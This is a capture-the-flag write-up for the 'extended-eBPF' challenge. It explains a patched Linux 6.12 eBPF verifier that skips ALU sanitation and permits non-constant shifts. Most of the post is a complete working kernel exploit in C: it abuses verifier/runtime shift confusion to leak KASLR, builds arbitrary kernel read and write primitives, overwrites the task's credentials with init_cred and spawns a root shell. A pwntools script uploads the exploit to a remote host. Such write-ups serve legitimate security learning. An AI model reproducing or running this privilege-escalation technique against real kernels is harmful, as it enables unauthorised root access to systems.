Post

extended-eBPF

I extended the eBPF because its cool.

Note: You can log in as the ctf user

nc 34.26.243.6 5000

Author: White

Reference Material

Analysis

We are provided a patched 6.12.47 linux kernel image, with the following patch file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 24ae8f33e5d7..e5641845ecc0 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -13030,7 +13030,7 @@ static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
 static bool can_skip_alu_sanitation(const struct bpf_verifier_env *env,
 				    const struct bpf_insn *insn)
 {
-	return env->bypass_spec_v1 || BPF_SRC(insn->code) == BPF_K;
+	return true;
 }
 
 static int update_alu_sanitation_state(struct bpf_insn_aux_data *aux,
@@ -14108,7 +14108,7 @@ static bool is_safe_to_compute_dst_reg_range(struct bpf_insn *insn,
 	case BPF_LSH:
 	case BPF_RSH:
 	case BPF_ARSH:
-		return (src_is_const && src_reg->umax_value < insn_bitness);
+		return (src_reg->umax_value < insn_bitness);
 	default:
 		return false;
 	}

There are 2 main “extensions” in this patch:

  1. Bypass the ALU sanitation entirely.
  2. Allow marking non-constant shifts as “safe”.

As mentioned in the kernel source comments:

1
2
3
4
5
6
7
8
9
10
	/* Shift operators range is only computable if shift dimension operand
	 * is a constant. Shifts greater than 31 or 63 are undefined. This
	 * includes shifts by a negative number.
	 */
	case BPF_LSH:
	case BPF_RSH:
	case BPF_ARSH:
		return (src_is_const && src_reg->umax_value < insn_bitness);
	default:
		return false;

The reason for this is mentioned in Intel x86 Software Developer Module, page 1783:

1
2
3
The destination operand can be a register or a memory location. The count operand can be an immediate value or
the CL register. The count is masked to 5 bits (or 6 bits if in 64-bit mode and REX.W is used). The count range is
limited to 0 to 31 (or 63 if 64-bit mode and REX.W is used). A special opcode encoding is provided for a count of 1.

This basically means that 1 >> 64 will eventually become 1 >> (64 & 0b111111), which is 1 >> 0 which is 1 (quite different from our typical expectation of 0). This is problematic, because it can become a source of confusion between the eBPF verifier and the runtime execution of the CPU. This is exactly why shift is very useful for us from an exploitation perspective.

The typical goal of an eBPF exploit (as I understand) is to help create reliable AAR (Arbitrary Address Read) and AAW (Arbitrary Address Write) primitives for a stable kernel exploit. Let’s see how we can achieve this.

Exploit

To communicate between a kernel-space eBPF program and a user-space process, we usually use maps. Maps, like in other languages are used to store data in key-value pairs. We can get a kernel address leak in the eBPF program fairly easily, but moving that leak into the map (so that we later read the leak from userspace) is not so easy. The verifier is designed to block this specific scenario, and will not allow any kernel addresses to reach the map data.

To solve this, we create confusion between the compile-time verifier and the actual runtime execution of the CPU. I will explain it gradually with the help of the CONFUSION macro from my solution:

1
2
3
4
5
6
#define CONFUSE                                                                \
  BPF_MOV64_IMM(BPF_REG_0, 0), BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),  \
      BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd),                                    \
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                                    \
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                                   \
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem), /* r0 = &map[0] */              \

Calling BPF_FUNC_map_lookup_elem expects arguments in REG_1 and REG_2 to be the map file descriptor and the address of map key. Hence we store 0 (the index) into R10-4.

REG_10 acts as the frame-pointer

This gives us a NULLable reference to the map value.

1
2
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),   /* if r0 == NULL: exit */       \
      BPF_EXIT_INSN(),                         /* r0 = map_value_ptr */        \

Then we make the verifier believe that the resulting reference is not NULL.

1
2
      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),                                     \
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),                            \

Then we backup the reference to REG_6. Next we dereference the pointer and obtain the map value in REG_0. Now since this is a dynamic situation, the verifier does not know the bounds of this value at runtime. But we can “force” it to be bounded like this:

1
2
      BPF_JMP_IMM(BPF_JLE, BPF_REG_0, 1, 1),                                   \
      BPF_EXIT_INSN(), /* execution: r0 = 1 ; verifier: r0 = [0,1] */          \

This will make the verifier believe that REG_0 is definitely <= 1.

Remember, that we manually set the map value to 1, so this assumption holds true at this point.

Now finally let’s trigger the bug:

1
2
3
4
5
6
7
8
      BPF_MOV64_IMM(BPF_REG_1, 1),                                             \
      BPF_ALU64_REG(BPF_RSH, BPF_REG_1, BPF_REG_0),                            \
      /* ^^^ vuln: r1 bounds do NOT get updated */ /* execution:               \
                                                      r1 = 0 ;                 \
                                                      verifier:                \
                                                      r1 = 1                   \
                                                    */                         \
      BPF_ALU64_IMM(                                                           \

We do 1 >> [0, 1]. Due to the allowance of non-constant shifts, this operation gets marked as “safe”, and the verifier does NOT update the bounds for REG_1. This leads to the verifier thinking that REG_1 is still 1 whereas in reality since REG_0 = 1 (as set by us), so at runtime REG_1 actually becomes 0.

It would be better if things were the other way around, so let’s do that:

1
2
3
4
5
      BPF_ALU64_IMM(                                                           \
          BPF_SUB, BPF_REG_1,                                                  \
          1), /* execution: r1 = 0xffffffffffffffff ; verifier: r1 = 0 */      \
      BPF_ALU64_IMM(BPF_AND, BPF_REG_1,                                        \
                    1) /* execution: r1 = 1 ; verifier: r1 = 0 */

By subtracting 1 and taking an AND-mask of 1 we invert this confusion and make the verifier believe it is 0, whereas in reality it is 1.

The beauty is that, now we can multiply this confused register with any value and add that as an “offset” to the map reference, and the verifier will allow it, since it thinks it is still 0, allowing us to make arbitrary reads/writes.

This way we can get KASLR leaks:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
void get_leaks(void) {
  oob_map_fd = bpf_map_create(4, 0x150, 1);

  bpf_map_update_elem(oob_map_fd, 0, 1);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, -OFF_MAP_VALUES),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 8),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, OFF_MAP_SELF_LOOP),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 16),
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
  uint64_t ops_leak = bpf_map_lookup_elem(oob_map_fd, 0, 1);
  INFO("ops_leak = %#lx", ops_leak);
  UPDATE_KBASE(ops_leak - OFF_KBASE_OPS);
  SUCCESS("kbase = %#lx", KBASE);
  init_task = KBASE_OFFSET(OFF_INIT_TASK);
  INFO("init_task = %#lx", init_task);
  init_cred = KBASE_OFFSET(OFF_INIT_CRED);
  INFO("init_cred = %#lx", init_cred);
  oob_map_leak = bpf_map_lookup_elem(oob_map_fd, 0, 2) - OFF_MAP_SELF_LOOP;
  SUCCESS("oob_map_leak = %#lx", oob_map_leak);
}

Furthermore, once we have basic leaks, we can build more powerful read/write primitives like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
uint64_t arb_read(uint64_t addr) {
  uint64_t offset = addr - oob_map_leak - OFF_MAP_VALUES;
  read_map_fd = bpf_map_create(4, 0x150, 1);
  bpf_map_update_elem(read_map_fd, 0, offset);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
      /* ^^^ save confusion to r7 */
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, read_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = offset */
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
      /* ^^^ restore confusion */
      BPF_ALU64_REG(BPF_MUL, BPF_REG_1, BPF_REG_0),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 8),
      BPF_EXIT_INSN(),
  };
  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
  return bpf_map_lookup_elem(oob_map_fd, 0, 1);
}

void arb_write(uint64_t addr, uint64_t value) {
  uint64_t offset = addr - oob_map_leak - 0xf8;
  write_map_fd = bpf_map_create(4, 0x150, 2);
  bpf_map_update_elem(write_map_fd, 0, offset);
  bpf_map_update_elem(write_map_fd, 1, value);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
      /* ^^^ save confusion to r7 */
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, write_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = offset */
      BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
      /* ^^^ save offset to r8 */
      BPF_MOV64_IMM(BPF_REG_0, 1),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, write_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = value */
      BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),
      /* ^^^ save value to r9 */
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
      /* ^^^ restore confusion */
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_8),
      /* ^^^ restore offset */
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_9),
      /* ^^^ restore value */
      BPF_ALU64_REG(BPF_MUL, BPF_REG_1, BPF_REG_0),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_2, 0),
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };
  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
}

Once we have leaks and read/write primitives, we can quickly traverse the task list and replace current->cred with &init_cred:

1
2
3
4
5
6
7
8
9
int main() {
  get_leaks();
  uint64_t curr_task =
      arb_read(init_task + OFF_TASK_STRUCT_PREV_TASK) - OFF_TASK_STRUCT_TASKS;
  INFO("curr_task = %#lx", curr_task);
  arb_write(curr_task + OFF_TASK_STRUCT_CRED, init_cred);
  win();
  real_pause();
}

Full exploit is shared below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
#include "bpf_stuff.h"
#include "kpwn/log.h"
#include "kpwn/core.h"

int oob_map_fd, read_map_fd, write_map_fd;
uint64_t oob_map_leak, init_task, init_cred;

enum offsets {
  OFF_MAP_VALUES = 0xf8,
  OFF_MAP_SELF_LOOP = 0x70,
  OFF_KBASE_OPS = 0xc1d9a0,
  OFF_INIT_TASK = 0x100a940,
  OFF_INIT_CRED = 0x103fd80,
  OFF_TASK_STRUCT_TASKS = 0x390,
  OFF_TASK_STRUCT_PREV_TASK = 0x398,
  OFF_TASK_STRUCT_CRED = 0x638,

};

#define CONFUSE                                                                \
  BPF_MOV64_IMM(BPF_REG_0, 0), BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),  \
      BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd),                                    \
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                                    \
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                                   \
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem), /* r0 = &map[0] */              \
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),   /* if r0 == NULL: exit */       \
      BPF_EXIT_INSN(),                         /* r0 = map_value_ptr */        \
      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),                                     \
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),                            \
      BPF_JMP_IMM(BPF_JLE, BPF_REG_0, 1, 1),                                   \
      BPF_EXIT_INSN(), /* execution: r0 = 1 ; verifier: r0 = [0,1] */          \
      BPF_MOV64_IMM(BPF_REG_1, 1),                                             \
      BPF_ALU64_REG(BPF_RSH, BPF_REG_1, BPF_REG_0),                            \
      /* ^^^ vuln: r1 bounds do NOT get updated */ /* execution:               \
                                                      r1 = 0 ;                 \
                                                      verifier:                \
                                                      r1 = 1                   \
                                                    */                         \
      BPF_ALU64_IMM(                                                           \
          BPF_SUB, BPF_REG_1,                                                  \
          1), /* execution: r1 = 0xffffffffffffffff ; verifier: r1 = 0 */      \
      BPF_ALU64_IMM(BPF_AND, BPF_REG_1,                                        \
                    1) /* execution: r1 = 1 ; verifier: r1 = 0 */

void get_leaks(void) {
  oob_map_fd = bpf_map_create(4, 0x150, 1);

  bpf_map_update_elem(oob_map_fd, 0, 1);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, -OFF_MAP_VALUES),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 8),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, OFF_MAP_SELF_LOOP),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 16),
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
  uint64_t ops_leak = bpf_map_lookup_elem(oob_map_fd, 0, 1);
  INFO("ops_leak = %#lx", ops_leak);
  UPDATE_KBASE(ops_leak - OFF_KBASE_OPS);
  SUCCESS("kbase = %#lx", KBASE);
  init_task = KBASE_OFFSET(OFF_INIT_TASK);
  INFO("init_task = %#lx", init_task);
  init_cred = KBASE_OFFSET(OFF_INIT_CRED);
  INFO("init_cred = %#lx", init_cred);
  oob_map_leak = bpf_map_lookup_elem(oob_map_fd, 0, 2) - OFF_MAP_SELF_LOOP;
  SUCCESS("oob_map_leak = %#lx", oob_map_leak);
}

uint64_t arb_read(uint64_t addr) {
  uint64_t offset = addr - oob_map_leak - OFF_MAP_VALUES;
  read_map_fd = bpf_map_create(4, 0x150, 1);
  bpf_map_update_elem(read_map_fd, 0, offset);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
      /* ^^^ save confusion to r7 */
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, read_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = offset */
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
      /* ^^^ restore confusion */
      BPF_ALU64_REG(BPF_MUL, BPF_REG_1, BPF_REG_0),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 8),
      BPF_EXIT_INSN(),
  };
  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
  return bpf_map_lookup_elem(oob_map_fd, 0, 1);
}

void arb_write(uint64_t addr, uint64_t value) {
  uint64_t offset = addr - oob_map_leak - 0xf8;
  write_map_fd = bpf_map_create(4, 0x150, 2);
  bpf_map_update_elem(write_map_fd, 0, offset);
  bpf_map_update_elem(write_map_fd, 1, value);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
      /* ^^^ save confusion to r7 */
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, write_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = offset */
      BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
      /* ^^^ save offset to r8 */
      BPF_MOV64_IMM(BPF_REG_0, 1),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, write_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = value */
      BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),
      /* ^^^ save value to r9 */
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
      /* ^^^ restore confusion */
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_8),
      /* ^^^ restore offset */
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_9),
      /* ^^^ restore value */
      BPF_ALU64_REG(BPF_MUL, BPF_REG_1, BPF_REG_0),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_2, 0),
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };
  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
}

void win(void) {
  if (getuid() != 0) {
    ERROR("Failed to get root");
  } else {
    SUCCESS("Got root");
  }
  puts("Here is your shell...");
  system("/bin/sh");
}

int main() {
  get_leaks();
  uint64_t curr_task =
      arb_read(init_task + OFF_TASK_STRUCT_PREV_TASK) - OFF_TASK_STRUCT_TASKS;
  INFO("curr_task = %#lx", curr_task);
  arb_write(curr_task + OFF_TASK_STRUCT_CRED, init_cred);
  win();
  real_pause();
}

We can upload this to the remote and get the flag with the following helper script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env python

from pwn import *
from gzip import GzipFile
from io import BytesIO
from tqdm import tqdm
from os import system
from subprocess import check_output

system('gcc -s -o ./exploit ./solve/solve.c ./solve/kpwn/*.c')

# Edit these
host = '34.26.243.6'
port = 5000

def chunk_exploit(exploit, chunk_size=500):
    for i in range(0, len(exploit), chunk_size):
        yield exploit[i:i+chunk_size]

exploit = BytesIO()
with open('./exploit', 'rb') as f_in:
    with GzipFile(fileobj=exploit, mode='wb') as f_out:
        f_out.write(f_in.read())
exploit = exploit.getvalue()
exploit = b64e(exploit)

if args.REMOTE:
    io = remote(host, port)
    log.info('Solving PoW')
    io.recvuntil(b'proof of work:\n')
    pow = io.recvline().strip()
    res = check_output(pow, shell=True)
    io.sendline(res)
    log.success('Done')
else:
    io = process('./start-qemu.sh')

log.info('Waiting for vm to load...')
io.recvuntil(b'Welcome to Buildroot')
io.sendlineafter(b'login: ', b'ctf')
sleep(1)
chunks = list(chunk_exploit(exploit))
for chunk in tqdm(chunks, desc="Uploading exploit", unit="chunk"):
    io.sendline(f'echo -n "{chunk}" >> exploit.gz.b64'.encode())
    io.recvuntil(b'$')
io.sendline(b'base64 -d exploit.gz.b64 > exploit.gz')
io.sendline(b'gunzip exploit.gz')
io.sendline(b'chmod +x exploit')
io.clean()
io.sendline(b'./exploit')
io.interactive()
This post is licensed under CC BY 4.0 by the author.